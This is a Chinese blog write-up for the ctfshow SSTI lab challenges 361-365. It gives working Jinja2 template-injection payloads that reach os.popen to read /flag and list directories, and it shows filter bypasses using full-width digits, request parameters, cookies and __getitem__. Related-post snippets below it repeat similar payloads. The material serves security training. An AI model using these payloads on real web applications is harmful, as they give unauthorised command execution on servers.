ctfshow web入门 SSTI

于 2024-08-27 00:57:47 发布
阅读量257 收藏 2
点赞数 9
文章标签: 前端 服务器 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_86043716/article/details/141576722
版权

从全局变量字典中获取名为popen的变量
7. 执行系统命令

"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag')

使用Popen类来执行cat /flag命令,这个命令通常用于读取名为flag的文件。
8. 读取命令输出

调用read()方法来读取Popen对象的输出,即cat /flag命令的输出。

payload

"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()

362

传参试试

轮流试试每个数字,发现只有2和3被过滤

而且只要字符串不包括2和3就能显示

使用全角数字进行绕过

关闭使用半角输入模式

“1234567890”

payload:

?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

363

数字没有被过滤掉

经过各种字母和符号尝试,发现会过滤“”

试试把“”进行url编码看看

还是会被过滤

但是传参会自动补齐双引号,所以索性不加了

?name={{x.__init__.__globals__[request.args.a].eval(request.args.b)}}&a=__builtins__&b=__import__('os').popen('cat /flag').read()

364

它将arg过滤掉了,所以没有办法直接GET传参

改用Cookie传

GET传参

?name={{x.__init__.__globals__[request.cookies.x1].eval(request.cookies.x2)}}

Cookie:

x1=__builtins__;x2=__import__('os').popen('cat /flag').read()

365

尝试Jinja2模板注入

过滤单双引号、[、args

找一下os

{{x.__class__.__bases__.__getitem__(0).__subclasses__()}}

在页面内查找

数出来是132

用__getitem__绕过中括号[过滤,request对象绕过引号''""过滤,cookie或者values绕过args过滤

得到:

{{x.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(132).__init__.__globals__.popen(request.cookies.x).read()}}

还有Cookie传参

x=ls /

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料
详情docs.qq.com/doc/DSlhRRFFyU2pVZGhS

2401_86043716
关注
【CTFSHOW】web入门 JWT
7ruth0hn的博客
09-27 1191
文章目录写在前面JWT浅析web345web346web347web348web349web350参考资料 写在前面 陇剑杯初赛出了JWT专题的赛题,被同队大佬ak了,一直不太懂,来刷刷 JWT浅析 JWT即JSON WEB TOKEN,由三个部分组成,并用两个“.”进行连接。第一部分为header(base64加密),第二部分为payload(base64加密),第三部分为verify signature,它的构成如下: HEADER中alg对应的加密方式为HS256,也可以选择其他对称或非对称的加密方
ctfshow web入门 命令执行payload
2h4ox1n9
06-15 1745
ctfshow web
CTFshow SSTI
starttv的博客
11-21 717
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。模板引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。SSTI 就是服务器端模板注入(Server-Side Template Injection)
ctfshow-ssti
weixin_74660472的博客
04-18 379
ssti漏洞原理ssti服务端模板注入,ssti主要为python的一些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入,模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。本文着重对flask模板注入进行浅析。morePython对象的继承,用魔术方法一步步找到可利用的方法去执行。即找到父类。
CTFshow——SSTI
D.MIND 的博客
03-06 2166
首先一定要了解有关python类的知识: python __base__等内置方法 python inspect模块解析 # coding=utf-8_ _author__ = "leaves" class Base(object): a = 0 def __init__(self): self._a = 10 pass class Child(Base): "测试测试" _b = 10 def __str__(
[CTFSHOW][WEB入门]SSTI模版注入
fallingskies
10-14 507
web361 Flask是一个使用Python编写的轻量级web应用框架,其WSGI工具箱采用Werkzeug,模板引擎则使用Jinja2。 参考https://xz.aliyun.com/t/3679#toc-8https://xz.aliyun.com/t/3679#toc-8 使用poc进行测试 {{5*5}} 显然存在模版注入。 查找可以利用的类 {{"".__class__.__bases__[0].__subclasses__()}} 已知<class '...
ctfshow-web364(SSTI)
m0_62094846的博客
04-30 560
用上题的方法,发现还是有东西被过滤了 筛选后发现是args 过滤了引号和args,上题的姿势不能用了,但是可以用chr()函数绕过。 可以用这个payload判断chr()函数的位置: {{().__class__.__bases__[0].__subclasses__()[§0§].__init__.__globals__.__builtins__.chr}} 用bp跑后发现有这几个,可以任意取 取80 分析一下别人的wp(现在的水平也只能这样了) ?name={%...
ctfshow-web365(SSTI)
m0_62094846的博客
05-05 314
这次是把args [ 和' 过滤了 有两种方式可以绕过[ 可以用__getitem__和pop代替,因为pop会破坏数组的结构,所以更推荐用__getitem__ ?name={%set+chr=[].__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__.chr%}{{[].__class__.__base__.__subclasses__()[132].__init__.__globals__
【CTFSHOW】web入门SSRF
7ruth0hn的博客
06-21 1180
CTFSHOW web入门SSRF 发现学习渗透和ctf对xss,ssrf,csrf,ssti都有挺高要求的,一直没怎么系统刷过题。今天学习学习,补补之前落下的债(* ̄3 ̄)╭ web351 扫描网站发现存在flag.php文件,通过分析和测试发现需要服务器本地访问,故使用传入127.0.0.1/flag.php web352 payload: web353 过滤代码: if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_
CTFSHOW-SSTI
Yb_140的博客
04-30 511
认识SSTI https://xz.aliyun.com/t/3679 SSTI模板注入绕过(进阶篇)_yu22x的博客-CSDN博客_ssti绕过 CTFshow-WEB入门-SSTI_bfengj的博客-CSDN博客 web361 ?name={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }} ?name={{ config.__class__.__init__.__globals__['
ctfshow-SSTI
ing_end的博客
05-07 679
SSTI web361 payload: ?name={{ config.__class__.__init__.__globals__['os'].popen('ls').read() }} ?name={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }} 之后打开 ?name={{ config.__class__.__init__.__globals__['os'].popen('cat ../flag
CTFSHOW SSTI
羽的博客
01-08 6098
文章目录web361web362web363web364web365web366、367web368web369web370web371web372 建议大家先看下笔者之前写的模板注入的文章 web361 payload name={{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} web362 payload ?name={{x.__init__.__glo
ctfshow--SSTI
qq_51684648的博客
03-15 601
ctfshow–SSTI 361、 {{7*‘7’}}回显是7777777,判断是jinjia2模板。 {{''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /f*').read()}} ''.__class__.mro__[1].__subclasses__()查看object下的所有子类集合。 362、 在__builtin__中有众多的可用函数,包括eval 1: ?name={{ur
ctfshow ssti
最新发布
07-27
CTFShow SSTI(Server-Side Template Injection)是一个与安全相关的话题,它涉及到服务器端模板注入漏洞。在某些情况下,当应用程序接受用户输入并将其作为模板的一部分进行解析时,攻击者可以利用这个漏洞来执行任意代码或获取敏感信息。 在CTF(Capture The Flag)比赛中,SSTI是一类常见的漏洞类型。攻击者可以通过构造特定的输入来绕过应用程序的过滤机制,成功注入恶意代码,从而导致服务器端执行该代码。 为了防止SSTI漏洞,开发人员应该谨慎处理用户输入,并在解析模板时使用安全的方法,如使用模板引擎提供的过滤器或转义函数。此外,安全审计和代码审查也是发现和修复SSTI漏洞的重要步骤。 如果你对SSTI漏洞有更具体的问题或需要进一步的解释,请告诉我。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值